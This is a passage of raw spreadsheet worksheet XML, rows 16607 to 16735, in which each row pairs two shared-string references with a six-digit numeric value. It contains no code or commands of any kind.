      </c>
    </row>
    <row r="16607" spans="1:3">
      <c r="A16607" s="28" t="s">
        <v>21908</v>
      </c>
      <c r="B16607" s="14" t="s">
        <v>13545</v>
      </c>
      <c r="C16607" s="15">
        <v>375972</v>
      </c>
    </row>
    <row r="16608" spans="1:3">
      <c r="A16608" s="28" t="s">
        <v>1036</v>
      </c>
      <c r="B16608" s="14" t="s">
        <v>9289</v>
      </c>
      <c r="C16608" s="15">
        <v>375973</v>
      </c>
    </row>
    <row r="16609" spans="1:3">
      <c r="A16609" s="28" t="s">
        <v>24236</v>
      </c>
      <c r="B16609" s="14" t="s">
        <v>13602</v>
      </c>
      <c r="C16609" s="15">
        <v>375978</v>
      </c>
    </row>
    <row r="16610" spans="1:3">
      <c r="A16610" s="28" t="s">
        <v>24237</v>
      </c>
      <c r="B16610" s="14" t="s">
        <v>13603</v>
      </c>
      <c r="C16610" s="15">
        <v>375981</v>
      </c>
    </row>
    <row r="16611" spans="1:3">
      <c r="A16611" s="28" t="s">
        <v>21956</v>
      </c>
      <c r="B16611" s="14" t="s">
        <v>11072</v>
      </c>
      <c r="C16611" s="15">
        <v>375982</v>
      </c>
    </row>
    <row r="16612" spans="1:3">
      <c r="A16612" s="28" t="s">
        <v>24238</v>
      </c>
      <c r="B16612" s="14" t="s">
        <v>13604</v>
      </c>
      <c r="C16612" s="15">
        <v>375984</v>
      </c>
    </row>
    <row r="16613" spans="1:3">
      <c r="A16613" s="28" t="s">
        <v>24239</v>
      </c>
      <c r="B16613" s="14" t="s">
        <v>13605</v>
      </c>
      <c r="C16613" s="15">
        <v>375985</v>
      </c>
    </row>
    <row r="16614" spans="1:3">
      <c r="A16614" s="28" t="s">
        <v>24240</v>
      </c>
      <c r="B16614" s="14" t="s">
        <v>13606</v>
      </c>
      <c r="C16614" s="15">
        <v>375987</v>
      </c>
    </row>
    <row r="16615" spans="1:3">
      <c r="A16615" s="28" t="s">
        <v>24241</v>
      </c>
      <c r="B16615" s="14" t="s">
        <v>13607</v>
      </c>
      <c r="C16615" s="15">
        <v>375988</v>
      </c>
    </row>
    <row r="16616" spans="1:3">
      <c r="A16616" s="28" t="s">
        <v>21908</v>
      </c>
      <c r="B16616" s="14" t="s">
        <v>13545</v>
      </c>
      <c r="C16616" s="15">
        <v>375989</v>
      </c>
    </row>
    <row r="16617" spans="1:3">
      <c r="A16617" s="28" t="s">
        <v>21957</v>
      </c>
      <c r="B16617" s="14" t="s">
        <v>11057</v>
      </c>
      <c r="C16617" s="15">
        <v>375990</v>
      </c>
    </row>
    <row r="16618" spans="1:3">
      <c r="A16618" s="28" t="s">
        <v>24242</v>
      </c>
      <c r="B16618" s="14" t="s">
        <v>13608</v>
      </c>
      <c r="C16618" s="15">
        <v>375991</v>
      </c>
    </row>
    <row r="16619" spans="1:3">
      <c r="A16619" s="28" t="s">
        <v>25326</v>
      </c>
      <c r="B16619" s="14" t="s">
        <v>10384</v>
      </c>
      <c r="C16619" s="15">
        <v>375992</v>
      </c>
    </row>
    <row r="16620" spans="1:3" ht="25.5">
      <c r="A16620" s="28" t="s">
        <v>25327</v>
      </c>
      <c r="B16620" s="14" t="s">
        <v>15282</v>
      </c>
      <c r="C16620" s="15">
        <v>375993</v>
      </c>
    </row>
    <row r="16621" spans="1:3">
      <c r="A16621" s="28" t="s">
        <v>21958</v>
      </c>
      <c r="B16621" s="14" t="s">
        <v>11073</v>
      </c>
      <c r="C16621" s="15">
        <v>375994</v>
      </c>
    </row>
    <row r="16622" spans="1:3">
      <c r="A16622" s="28" t="s">
        <v>21959</v>
      </c>
      <c r="B16622" s="14" t="s">
        <v>11074</v>
      </c>
      <c r="C16622" s="15">
        <v>375995</v>
      </c>
    </row>
    <row r="16623" spans="1:3">
      <c r="A16623" s="28" t="s">
        <v>25328</v>
      </c>
      <c r="B16623" s="14" t="s">
        <v>15283</v>
      </c>
      <c r="C16623" s="15">
        <v>375996</v>
      </c>
    </row>
    <row r="16624" spans="1:3">
      <c r="A16624" s="28" t="s">
        <v>779</v>
      </c>
      <c r="B16624" s="14" t="s">
        <v>8550</v>
      </c>
      <c r="C16624" s="15">
        <v>375997</v>
      </c>
    </row>
    <row r="16625" spans="1:3">
      <c r="A16625" s="28" t="s">
        <v>21848</v>
      </c>
      <c r="B16625" s="14" t="s">
        <v>11075</v>
      </c>
      <c r="C16625" s="15">
        <v>375998</v>
      </c>
    </row>
    <row r="16626" spans="1:3">
      <c r="A16626" s="28" t="s">
        <v>24243</v>
      </c>
      <c r="B16626" s="14" t="s">
        <v>13609</v>
      </c>
      <c r="C16626" s="15">
        <v>375999</v>
      </c>
    </row>
    <row r="16627" spans="1:3">
      <c r="A16627" s="28" t="s">
        <v>25329</v>
      </c>
      <c r="B16627" s="14" t="s">
        <v>15284</v>
      </c>
      <c r="C16627" s="15">
        <v>376650</v>
      </c>
    </row>
    <row r="16628" spans="1:3">
      <c r="A16628" s="28" t="s">
        <v>25330</v>
      </c>
      <c r="B16628" s="14" t="s">
        <v>15285</v>
      </c>
      <c r="C16628" s="15">
        <v>376651</v>
      </c>
    </row>
    <row r="16629" spans="1:3">
      <c r="A16629" s="28" t="s">
        <v>25331</v>
      </c>
      <c r="B16629" s="14" t="s">
        <v>15286</v>
      </c>
      <c r="C16629" s="15">
        <v>376652</v>
      </c>
    </row>
    <row r="16630" spans="1:3">
      <c r="A16630" s="28" t="s">
        <v>24244</v>
      </c>
      <c r="B16630" s="14" t="s">
        <v>13610</v>
      </c>
      <c r="C16630" s="15">
        <v>376653</v>
      </c>
    </row>
    <row r="16631" spans="1:3">
      <c r="A16631" s="28" t="s">
        <v>24245</v>
      </c>
      <c r="B16631" s="14" t="s">
        <v>15287</v>
      </c>
      <c r="C16631" s="15">
        <v>376655</v>
      </c>
    </row>
    <row r="16632" spans="1:3">
      <c r="A16632" s="28" t="s">
        <v>1215</v>
      </c>
      <c r="B16632" s="14" t="s">
        <v>8625</v>
      </c>
      <c r="C16632" s="15">
        <v>376657</v>
      </c>
    </row>
    <row r="16633" spans="1:3">
      <c r="A16633" s="28" t="s">
        <v>25332</v>
      </c>
      <c r="B16633" s="14" t="s">
        <v>15288</v>
      </c>
      <c r="C16633" s="15">
        <v>376660</v>
      </c>
    </row>
    <row r="16634" spans="1:3">
      <c r="A16634" s="28" t="s">
        <v>25333</v>
      </c>
      <c r="B16634" s="14" t="s">
        <v>15289</v>
      </c>
      <c r="C16634" s="15">
        <v>376661</v>
      </c>
    </row>
    <row r="16635" spans="1:3">
      <c r="A16635" s="28" t="s">
        <v>25334</v>
      </c>
      <c r="B16635" s="14" t="s">
        <v>15290</v>
      </c>
      <c r="C16635" s="15">
        <v>376662</v>
      </c>
    </row>
    <row r="16636" spans="1:3">
      <c r="A16636" s="28" t="s">
        <v>25335</v>
      </c>
      <c r="B16636" s="14" t="s">
        <v>15291</v>
      </c>
      <c r="C16636" s="15">
        <v>376663</v>
      </c>
    </row>
    <row r="16637" spans="1:3">
      <c r="A16637" s="28" t="s">
        <v>25336</v>
      </c>
      <c r="B16637" s="14" t="s">
        <v>15292</v>
      </c>
      <c r="C16637" s="15">
        <v>376664</v>
      </c>
    </row>
    <row r="16638" spans="1:3">
      <c r="A16638" s="28" t="s">
        <v>25337</v>
      </c>
      <c r="B16638" s="14" t="s">
        <v>15293</v>
      </c>
      <c r="C16638" s="15">
        <v>376665</v>
      </c>
    </row>
    <row r="16639" spans="1:3">
      <c r="A16639" s="28" t="s">
        <v>25338</v>
      </c>
      <c r="B16639" s="14" t="s">
        <v>15294</v>
      </c>
      <c r="C16639" s="15">
        <v>376666</v>
      </c>
    </row>
    <row r="16640" spans="1:3">
      <c r="A16640" s="28" t="s">
        <v>25339</v>
      </c>
      <c r="B16640" s="14" t="s">
        <v>15295</v>
      </c>
      <c r="C16640" s="15">
        <v>376667</v>
      </c>
    </row>
    <row r="16641" spans="1:3">
      <c r="A16641" s="28" t="s">
        <v>25340</v>
      </c>
      <c r="B16641" s="14" t="s">
        <v>15296</v>
      </c>
      <c r="C16641" s="15">
        <v>376668</v>
      </c>
    </row>
    <row r="16642" spans="1:3">
      <c r="A16642" s="28" t="s">
        <v>25341</v>
      </c>
      <c r="B16642" s="14" t="s">
        <v>15297</v>
      </c>
      <c r="C16642" s="15">
        <v>376670</v>
      </c>
    </row>
    <row r="16643" spans="1:3">
      <c r="A16643" s="28" t="s">
        <v>7064</v>
      </c>
      <c r="B16643" s="14" t="s">
        <v>15298</v>
      </c>
      <c r="C16643" s="15">
        <v>376671</v>
      </c>
    </row>
    <row r="16644" spans="1:3">
      <c r="A16644" s="28" t="s">
        <v>25342</v>
      </c>
      <c r="B16644" s="14" t="s">
        <v>15299</v>
      </c>
      <c r="C16644" s="15">
        <v>376672</v>
      </c>
    </row>
    <row r="16645" spans="1:3">
      <c r="A16645" s="28" t="s">
        <v>24246</v>
      </c>
      <c r="B16645" s="14" t="s">
        <v>13612</v>
      </c>
      <c r="C16645" s="15">
        <v>376800</v>
      </c>
    </row>
    <row r="16646" spans="1:3">
      <c r="A16646" s="28" t="s">
        <v>24247</v>
      </c>
      <c r="B16646" s="14" t="s">
        <v>13613</v>
      </c>
      <c r="C16646" s="15">
        <v>376801</v>
      </c>
    </row>
    <row r="16647" spans="1:3">
      <c r="A16647" s="28" t="s">
        <v>220</v>
      </c>
      <c r="B16647" s="14" t="s">
        <v>9297</v>
      </c>
      <c r="C16647" s="15">
        <v>376802</v>
      </c>
    </row>
    <row r="16648" spans="1:3">
      <c r="A16648" s="28" t="s">
        <v>35</v>
      </c>
      <c r="B16648" s="14" t="s">
        <v>7754</v>
      </c>
      <c r="C16648" s="15">
        <v>376804</v>
      </c>
    </row>
    <row r="16649" spans="1:3">
      <c r="A16649" s="28" t="s">
        <v>24248</v>
      </c>
      <c r="B16649" s="14" t="s">
        <v>13614</v>
      </c>
      <c r="C16649" s="15">
        <v>376810</v>
      </c>
    </row>
    <row r="16650" spans="1:3">
      <c r="A16650" s="28" t="s">
        <v>24249</v>
      </c>
      <c r="B16650" s="14" t="s">
        <v>13615</v>
      </c>
      <c r="C16650" s="15">
        <v>376811</v>
      </c>
    </row>
    <row r="16651" spans="1:3">
      <c r="A16651" s="28" t="s">
        <v>24250</v>
      </c>
      <c r="B16651" s="14" t="s">
        <v>13616</v>
      </c>
      <c r="C16651" s="15">
        <v>376819</v>
      </c>
    </row>
    <row r="16652" spans="1:3">
      <c r="A16652" s="28" t="s">
        <v>24251</v>
      </c>
      <c r="B16652" s="14" t="s">
        <v>13617</v>
      </c>
      <c r="C16652" s="15">
        <v>376821</v>
      </c>
    </row>
    <row r="16653" spans="1:3">
      <c r="A16653" s="28" t="s">
        <v>24252</v>
      </c>
      <c r="B16653" s="14" t="s">
        <v>13214</v>
      </c>
      <c r="C16653" s="15">
        <v>376822</v>
      </c>
    </row>
    <row r="16654" spans="1:3">
      <c r="A16654" s="28" t="s">
        <v>21967</v>
      </c>
      <c r="B16654" s="14" t="s">
        <v>10942</v>
      </c>
      <c r="C16654" s="15">
        <v>376823</v>
      </c>
    </row>
    <row r="16655" spans="1:3">
      <c r="A16655" s="28" t="s">
        <v>24253</v>
      </c>
      <c r="B16655" s="14" t="s">
        <v>13618</v>
      </c>
      <c r="C16655" s="15">
        <v>376825</v>
      </c>
    </row>
    <row r="16656" spans="1:3">
      <c r="A16656" s="28" t="s">
        <v>17</v>
      </c>
      <c r="B16656" s="14" t="s">
        <v>8676</v>
      </c>
      <c r="C16656" s="15">
        <v>376826</v>
      </c>
    </row>
    <row r="16657" spans="1:3">
      <c r="A16657" s="28" t="s">
        <v>20452</v>
      </c>
      <c r="B16657" s="14" t="s">
        <v>8071</v>
      </c>
      <c r="C16657" s="15">
        <v>376827</v>
      </c>
    </row>
    <row r="16658" spans="1:3">
      <c r="A16658" s="28" t="s">
        <v>24254</v>
      </c>
      <c r="B16658" s="14" t="s">
        <v>13619</v>
      </c>
      <c r="C16658" s="15">
        <v>376830</v>
      </c>
    </row>
    <row r="16659" spans="1:3">
      <c r="A16659" s="28" t="s">
        <v>166</v>
      </c>
      <c r="B16659" s="14" t="s">
        <v>9326</v>
      </c>
      <c r="C16659" s="15">
        <v>376833</v>
      </c>
    </row>
    <row r="16660" spans="1:3">
      <c r="A16660" s="28" t="s">
        <v>19913</v>
      </c>
      <c r="B16660" s="14" t="s">
        <v>8566</v>
      </c>
      <c r="C16660" s="15">
        <v>376835</v>
      </c>
    </row>
    <row r="16661" spans="1:3">
      <c r="A16661" s="28" t="s">
        <v>21971</v>
      </c>
      <c r="B16661" s="14" t="s">
        <v>11086</v>
      </c>
      <c r="C16661" s="15">
        <v>376837</v>
      </c>
    </row>
    <row r="16662" spans="1:3">
      <c r="A16662" s="28" t="s">
        <v>21975</v>
      </c>
      <c r="B16662" s="14" t="s">
        <v>11090</v>
      </c>
      <c r="C16662" s="15">
        <v>376844</v>
      </c>
    </row>
    <row r="16663" spans="1:3">
      <c r="A16663" s="28" t="s">
        <v>24255</v>
      </c>
      <c r="B16663" s="14" t="s">
        <v>15300</v>
      </c>
      <c r="C16663" s="15">
        <v>376847</v>
      </c>
    </row>
    <row r="16664" spans="1:3">
      <c r="A16664" s="28" t="s">
        <v>24256</v>
      </c>
      <c r="B16664" s="14" t="s">
        <v>15301</v>
      </c>
      <c r="C16664" s="15">
        <v>376848</v>
      </c>
    </row>
    <row r="16665" spans="1:3">
      <c r="A16665" s="28" t="s">
        <v>24257</v>
      </c>
      <c r="B16665" s="14" t="s">
        <v>13622</v>
      </c>
      <c r="C16665" s="15">
        <v>376932</v>
      </c>
    </row>
    <row r="16666" spans="1:3">
      <c r="A16666" s="28" t="s">
        <v>25343</v>
      </c>
      <c r="B16666" s="14" t="s">
        <v>15302</v>
      </c>
      <c r="C16666" s="15">
        <v>376950</v>
      </c>
    </row>
    <row r="16667" spans="1:3">
      <c r="A16667" s="28" t="s">
        <v>779</v>
      </c>
      <c r="B16667" s="14" t="s">
        <v>8550</v>
      </c>
      <c r="C16667" s="15">
        <v>376951</v>
      </c>
    </row>
    <row r="16668" spans="1:3">
      <c r="A16668" s="28" t="s">
        <v>21036</v>
      </c>
      <c r="B16668" s="14" t="s">
        <v>10137</v>
      </c>
      <c r="C16668" s="15">
        <v>376953</v>
      </c>
    </row>
    <row r="16669" spans="1:3">
      <c r="A16669" s="28" t="s">
        <v>554</v>
      </c>
      <c r="B16669" s="14" t="s">
        <v>9761</v>
      </c>
      <c r="C16669" s="15">
        <v>376954</v>
      </c>
    </row>
    <row r="16670" spans="1:3">
      <c r="A16670" s="28" t="s">
        <v>4113</v>
      </c>
      <c r="B16670" s="14" t="s">
        <v>9613</v>
      </c>
      <c r="C16670" s="15">
        <v>376955</v>
      </c>
    </row>
    <row r="16671" spans="1:3">
      <c r="A16671" s="28" t="s">
        <v>21976</v>
      </c>
      <c r="B16671" s="14" t="s">
        <v>11091</v>
      </c>
      <c r="C16671" s="15">
        <v>376956</v>
      </c>
    </row>
    <row r="16672" spans="1:3">
      <c r="A16672" s="28" t="s">
        <v>21977</v>
      </c>
      <c r="B16672" s="14" t="s">
        <v>11092</v>
      </c>
      <c r="C16672" s="15">
        <v>376957</v>
      </c>
    </row>
    <row r="16673" spans="1:3">
      <c r="A16673" s="28" t="s">
        <v>21978</v>
      </c>
      <c r="B16673" s="14" t="s">
        <v>10310</v>
      </c>
      <c r="C16673" s="15">
        <v>376958</v>
      </c>
    </row>
    <row r="16674" spans="1:3">
      <c r="A16674" s="28" t="s">
        <v>4415</v>
      </c>
      <c r="B16674" s="14" t="s">
        <v>9153</v>
      </c>
      <c r="C16674" s="15">
        <v>376959</v>
      </c>
    </row>
    <row r="16675" spans="1:3">
      <c r="A16675" s="28" t="s">
        <v>572</v>
      </c>
      <c r="B16675" s="14" t="s">
        <v>11093</v>
      </c>
      <c r="C16675" s="15">
        <v>376961</v>
      </c>
    </row>
    <row r="16676" spans="1:3">
      <c r="A16676" s="28" t="s">
        <v>612</v>
      </c>
      <c r="B16676" s="14" t="s">
        <v>7379</v>
      </c>
      <c r="C16676" s="15">
        <v>376962</v>
      </c>
    </row>
    <row r="16677" spans="1:3">
      <c r="A16677" s="28" t="s">
        <v>21979</v>
      </c>
      <c r="B16677" s="14" t="s">
        <v>11095</v>
      </c>
      <c r="C16677" s="15">
        <v>376965</v>
      </c>
    </row>
    <row r="16678" spans="1:3">
      <c r="A16678" s="28" t="s">
        <v>21980</v>
      </c>
      <c r="B16678" s="14" t="s">
        <v>8912</v>
      </c>
      <c r="C16678" s="15">
        <v>376966</v>
      </c>
    </row>
    <row r="16679" spans="1:3">
      <c r="A16679" s="28" t="s">
        <v>20599</v>
      </c>
      <c r="B16679" s="14" t="s">
        <v>9669</v>
      </c>
      <c r="C16679" s="15">
        <v>376968</v>
      </c>
    </row>
    <row r="16680" spans="1:3">
      <c r="A16680" s="28" t="s">
        <v>21981</v>
      </c>
      <c r="B16680" s="14" t="s">
        <v>11096</v>
      </c>
      <c r="C16680" s="15">
        <v>376969</v>
      </c>
    </row>
    <row r="16681" spans="1:3">
      <c r="A16681" s="28" t="s">
        <v>21982</v>
      </c>
      <c r="B16681" s="14" t="s">
        <v>11097</v>
      </c>
      <c r="C16681" s="15">
        <v>376971</v>
      </c>
    </row>
    <row r="16682" spans="1:3">
      <c r="A16682" s="28" t="s">
        <v>21983</v>
      </c>
      <c r="B16682" s="14" t="s">
        <v>11098</v>
      </c>
      <c r="C16682" s="15">
        <v>376972</v>
      </c>
    </row>
    <row r="16683" spans="1:3">
      <c r="A16683" s="28" t="s">
        <v>21984</v>
      </c>
      <c r="B16683" s="14" t="s">
        <v>11099</v>
      </c>
      <c r="C16683" s="15">
        <v>376973</v>
      </c>
    </row>
    <row r="16684" spans="1:3">
      <c r="A16684" s="28" t="s">
        <v>20527</v>
      </c>
      <c r="B16684" s="14" t="s">
        <v>9582</v>
      </c>
      <c r="C16684" s="15">
        <v>376975</v>
      </c>
    </row>
    <row r="16685" spans="1:3">
      <c r="A16685" s="28" t="s">
        <v>74</v>
      </c>
      <c r="B16685" s="14" t="s">
        <v>8556</v>
      </c>
      <c r="C16685" s="15">
        <v>376976</v>
      </c>
    </row>
    <row r="16686" spans="1:3">
      <c r="A16686" s="28" t="s">
        <v>123</v>
      </c>
      <c r="B16686" s="14" t="s">
        <v>9086</v>
      </c>
      <c r="C16686" s="15">
        <v>376977</v>
      </c>
    </row>
    <row r="16687" spans="1:3">
      <c r="A16687" s="28" t="s">
        <v>4373</v>
      </c>
      <c r="B16687" s="14" t="s">
        <v>9580</v>
      </c>
      <c r="C16687" s="15">
        <v>376978</v>
      </c>
    </row>
    <row r="16688" spans="1:3">
      <c r="A16688" s="28" t="s">
        <v>21985</v>
      </c>
      <c r="B16688" s="14" t="s">
        <v>11100</v>
      </c>
      <c r="C16688" s="15">
        <v>376979</v>
      </c>
    </row>
    <row r="16689" spans="1:3">
      <c r="A16689" s="28" t="s">
        <v>969</v>
      </c>
      <c r="B16689" s="14" t="s">
        <v>8635</v>
      </c>
      <c r="C16689" s="15">
        <v>376982</v>
      </c>
    </row>
    <row r="16690" spans="1:3">
      <c r="A16690" s="28" t="s">
        <v>21986</v>
      </c>
      <c r="B16690" s="14" t="s">
        <v>11101</v>
      </c>
      <c r="C16690" s="15">
        <v>376983</v>
      </c>
    </row>
    <row r="16691" spans="1:3">
      <c r="A16691" s="28" t="s">
        <v>21987</v>
      </c>
      <c r="B16691" s="14" t="s">
        <v>11102</v>
      </c>
      <c r="C16691" s="15">
        <v>376984</v>
      </c>
    </row>
    <row r="16692" spans="1:3">
      <c r="A16692" s="28" t="s">
        <v>21988</v>
      </c>
      <c r="B16692" s="14" t="s">
        <v>11103</v>
      </c>
      <c r="C16692" s="15">
        <v>376985</v>
      </c>
    </row>
    <row r="16693" spans="1:3">
      <c r="A16693" s="28" t="s">
        <v>1060</v>
      </c>
      <c r="B16693" s="14" t="s">
        <v>10420</v>
      </c>
      <c r="C16693" s="15">
        <v>376986</v>
      </c>
    </row>
    <row r="16694" spans="1:3">
      <c r="A16694" s="28" t="s">
        <v>21989</v>
      </c>
      <c r="B16694" s="14" t="s">
        <v>11104</v>
      </c>
      <c r="C16694" s="15">
        <v>376987</v>
      </c>
    </row>
    <row r="16695" spans="1:3">
      <c r="A16695" s="28" t="s">
        <v>21990</v>
      </c>
      <c r="B16695" s="14" t="s">
        <v>11105</v>
      </c>
      <c r="C16695" s="15">
        <v>376988</v>
      </c>
    </row>
    <row r="16696" spans="1:3">
      <c r="A16696" s="28" t="s">
        <v>21991</v>
      </c>
      <c r="B16696" s="14" t="s">
        <v>11106</v>
      </c>
      <c r="C16696" s="15">
        <v>376989</v>
      </c>
    </row>
    <row r="16697" spans="1:3">
      <c r="A16697" s="28" t="s">
        <v>20729</v>
      </c>
      <c r="B16697" s="14" t="s">
        <v>7837</v>
      </c>
      <c r="C16697" s="15">
        <v>377900</v>
      </c>
    </row>
    <row r="16698" spans="1:3">
      <c r="A16698" s="28" t="s">
        <v>21992</v>
      </c>
      <c r="B16698" s="14" t="s">
        <v>11107</v>
      </c>
      <c r="C16698" s="15">
        <v>377901</v>
      </c>
    </row>
    <row r="16699" spans="1:3">
      <c r="A16699" s="28" t="s">
        <v>21993</v>
      </c>
      <c r="B16699" s="14" t="s">
        <v>11108</v>
      </c>
      <c r="C16699" s="15">
        <v>377910</v>
      </c>
    </row>
    <row r="16700" spans="1:3">
      <c r="A16700" s="28" t="s">
        <v>19819</v>
      </c>
      <c r="B16700" s="14" t="s">
        <v>8784</v>
      </c>
      <c r="C16700" s="15">
        <v>377911</v>
      </c>
    </row>
    <row r="16701" spans="1:3">
      <c r="A16701" s="28" t="s">
        <v>21994</v>
      </c>
      <c r="B16701" s="14" t="s">
        <v>11109</v>
      </c>
      <c r="C16701" s="15">
        <v>377950</v>
      </c>
    </row>
    <row r="16702" spans="1:3">
      <c r="A16702" s="28" t="s">
        <v>21995</v>
      </c>
      <c r="B16702" s="14" t="s">
        <v>11110</v>
      </c>
      <c r="C16702" s="15">
        <v>377951</v>
      </c>
    </row>
    <row r="16703" spans="1:3">
      <c r="A16703" s="28" t="s">
        <v>7135</v>
      </c>
      <c r="B16703" s="14" t="s">
        <v>13623</v>
      </c>
      <c r="C16703" s="15">
        <v>378000</v>
      </c>
    </row>
    <row r="16704" spans="1:3">
      <c r="A16704" s="28" t="s">
        <v>7137</v>
      </c>
      <c r="B16704" s="14" t="s">
        <v>13625</v>
      </c>
      <c r="C16704" s="15">
        <v>378002</v>
      </c>
    </row>
    <row r="16705" spans="1:3">
      <c r="A16705" s="28" t="s">
        <v>25344</v>
      </c>
      <c r="B16705" s="14" t="s">
        <v>11728</v>
      </c>
      <c r="C16705" s="15">
        <v>378003</v>
      </c>
    </row>
    <row r="16706" spans="1:3">
      <c r="A16706" s="28" t="s">
        <v>24261</v>
      </c>
      <c r="B16706" s="14" t="s">
        <v>13629</v>
      </c>
      <c r="C16706" s="15">
        <v>378025</v>
      </c>
    </row>
    <row r="16707" spans="1:3">
      <c r="A16707" s="28" t="s">
        <v>20178</v>
      </c>
      <c r="B16707" s="14" t="s">
        <v>7484</v>
      </c>
      <c r="C16707" s="15">
        <v>378100</v>
      </c>
    </row>
    <row r="16708" spans="1:3">
      <c r="A16708" s="28" t="s">
        <v>20178</v>
      </c>
      <c r="B16708" s="14" t="s">
        <v>7484</v>
      </c>
      <c r="C16708" s="15">
        <v>378102</v>
      </c>
    </row>
    <row r="16709" spans="1:3">
      <c r="A16709" s="28" t="s">
        <v>20178</v>
      </c>
      <c r="B16709" s="14" t="s">
        <v>7484</v>
      </c>
      <c r="C16709" s="15">
        <v>378106</v>
      </c>
    </row>
    <row r="16710" spans="1:3">
      <c r="A16710" s="28" t="s">
        <v>24272</v>
      </c>
      <c r="B16710" s="14" t="s">
        <v>13639</v>
      </c>
      <c r="C16710" s="15">
        <v>378107</v>
      </c>
    </row>
    <row r="16711" spans="1:3">
      <c r="A16711" s="28" t="s">
        <v>19807</v>
      </c>
      <c r="B16711" s="14" t="s">
        <v>12092</v>
      </c>
      <c r="C16711" s="15">
        <v>378110</v>
      </c>
    </row>
    <row r="16712" spans="1:3">
      <c r="A16712" s="28" t="s">
        <v>19807</v>
      </c>
      <c r="B16712" s="14" t="s">
        <v>8772</v>
      </c>
      <c r="C16712" s="15">
        <v>378113</v>
      </c>
    </row>
    <row r="16713" spans="1:3">
      <c r="A16713" s="28" t="s">
        <v>24273</v>
      </c>
      <c r="B16713" s="14" t="s">
        <v>11226</v>
      </c>
      <c r="C16713" s="15">
        <v>378120</v>
      </c>
    </row>
    <row r="16714" spans="1:3">
      <c r="A16714" s="28" t="s">
        <v>24274</v>
      </c>
      <c r="B16714" s="14" t="s">
        <v>15303</v>
      </c>
      <c r="C16714" s="15">
        <v>378123</v>
      </c>
    </row>
    <row r="16715" spans="1:3">
      <c r="A16715" s="28" t="s">
        <v>24276</v>
      </c>
      <c r="B16715" s="14" t="s">
        <v>15304</v>
      </c>
      <c r="C16715" s="15">
        <v>378140</v>
      </c>
    </row>
    <row r="16716" spans="1:3">
      <c r="A16716" s="28" t="s">
        <v>24278</v>
      </c>
      <c r="B16716" s="14" t="s">
        <v>13645</v>
      </c>
      <c r="C16716" s="15">
        <v>378200</v>
      </c>
    </row>
    <row r="16717" spans="1:3">
      <c r="A16717" s="28" t="s">
        <v>21997</v>
      </c>
      <c r="B16717" s="14" t="s">
        <v>11112</v>
      </c>
      <c r="C16717" s="15">
        <v>378300</v>
      </c>
    </row>
    <row r="16718" spans="1:3">
      <c r="A16718" s="28" t="s">
        <v>21998</v>
      </c>
      <c r="B16718" s="14" t="s">
        <v>11113</v>
      </c>
      <c r="C16718" s="15">
        <v>378301</v>
      </c>
    </row>
    <row r="16719" spans="1:3">
      <c r="A16719" s="28" t="s">
        <v>24279</v>
      </c>
      <c r="B16719" s="14" t="s">
        <v>11887</v>
      </c>
      <c r="C16719" s="15">
        <v>378302</v>
      </c>
    </row>
    <row r="16720" spans="1:3">
      <c r="A16720" s="28" t="s">
        <v>21999</v>
      </c>
      <c r="B16720" s="14" t="s">
        <v>13646</v>
      </c>
      <c r="C16720" s="15">
        <v>378303</v>
      </c>
    </row>
    <row r="16721" spans="1:3">
      <c r="A16721" s="28" t="s">
        <v>22000</v>
      </c>
      <c r="B16721" s="14" t="s">
        <v>11782</v>
      </c>
      <c r="C16721" s="15">
        <v>378304</v>
      </c>
    </row>
    <row r="16722" spans="1:3">
      <c r="A16722" s="28" t="s">
        <v>24280</v>
      </c>
      <c r="B16722" s="14" t="s">
        <v>13647</v>
      </c>
      <c r="C16722" s="15">
        <v>378306</v>
      </c>
    </row>
    <row r="16723" spans="1:3">
      <c r="A16723" s="28" t="s">
        <v>24281</v>
      </c>
      <c r="B16723" s="14" t="s">
        <v>13648</v>
      </c>
      <c r="C16723" s="15">
        <v>378307</v>
      </c>
    </row>
    <row r="16724" spans="1:3">
      <c r="A16724" s="28" t="s">
        <v>24282</v>
      </c>
      <c r="B16724" s="14" t="s">
        <v>13649</v>
      </c>
      <c r="C16724" s="15">
        <v>378308</v>
      </c>
    </row>
    <row r="16725" spans="1:3">
      <c r="A16725" s="28" t="s">
        <v>25345</v>
      </c>
      <c r="B16725" s="14" t="s">
        <v>15305</v>
      </c>
      <c r="C16725" s="15">
        <v>378309</v>
      </c>
    </row>
    <row r="16726" spans="1:3">
      <c r="A16726" s="28" t="s">
        <v>22002</v>
      </c>
      <c r="B16726" s="14" t="s">
        <v>13650</v>
      </c>
      <c r="C16726" s="15">
        <v>378341</v>
      </c>
    </row>
    <row r="16727" spans="1:3">
      <c r="A16727" s="28" t="s">
        <v>25346</v>
      </c>
      <c r="B16727" s="14" t="s">
        <v>15306</v>
      </c>
      <c r="C16727" s="15">
        <v>378342</v>
      </c>
    </row>
    <row r="16728" spans="1:3">
      <c r="A16728" s="28" t="s">
        <v>25347</v>
      </c>
      <c r="B16728" s="14" t="s">
        <v>15307</v>
      </c>
      <c r="C16728" s="15">
        <v>378343</v>
      </c>
    </row>
    <row r="16729" spans="1:3">
      <c r="A16729" s="28" t="s">
        <v>24283</v>
      </c>
      <c r="B16729" s="14" t="s">
        <v>13651</v>
      </c>
      <c r="C16729" s="15">
        <v>378350</v>
      </c>
    </row>
    <row r="16730" spans="1:3">
      <c r="A16730" s="28" t="s">
        <v>24284</v>
      </c>
      <c r="B16730" s="14" t="s">
        <v>13652</v>
      </c>
      <c r="C16730" s="15">
        <v>378352</v>
      </c>
    </row>
    <row r="16731" spans="1:3">
      <c r="A16731" s="28" t="s">
        <v>19054</v>
      </c>
      <c r="B16731" s="14" t="s">
        <v>7473</v>
      </c>
      <c r="C16731" s="15">
        <v>378353</v>
      </c>
    </row>
    <row r="16732" spans="1:3">
      <c r="A16732" s="28" t="s">
        <v>25348</v>
      </c>
      <c r="B16732" s="14" t="s">
        <v>15308</v>
      </c>
      <c r="C16732" s="15">
        <v>378354</v>
      </c>
    </row>
    <row r="16733" spans="1:3">
      <c r="A16733" s="28" t="s">
        <v>19055</v>
      </c>
      <c r="B16733" s="14" t="s">
        <v>7474</v>
      </c>
      <c r="C16733" s="15">
        <v>378355</v>
      </c>
    </row>
    <row r="16734" spans="1:3">
      <c r="A16734" s="28" t="s">
        <v>24285</v>
      </c>
      <c r="B16734" s="14" t="s">
        <v>13653</v>
      </c>
      <c r="C16734" s="15">
        <v>378356</v>
      </c>
    </row>
    <row r="16735" spans="1:3">
      <c r="A16735" s="28" t="s">
        <v>25349</v>
      </c>
      <c r="B16735" s="14" t="s">
        <v>15309</v>
      </c>
      <c r="C16735" s="15">
        <v>378360</v>
      </c>
    </row>
    <row r="16736" spans="1:3">
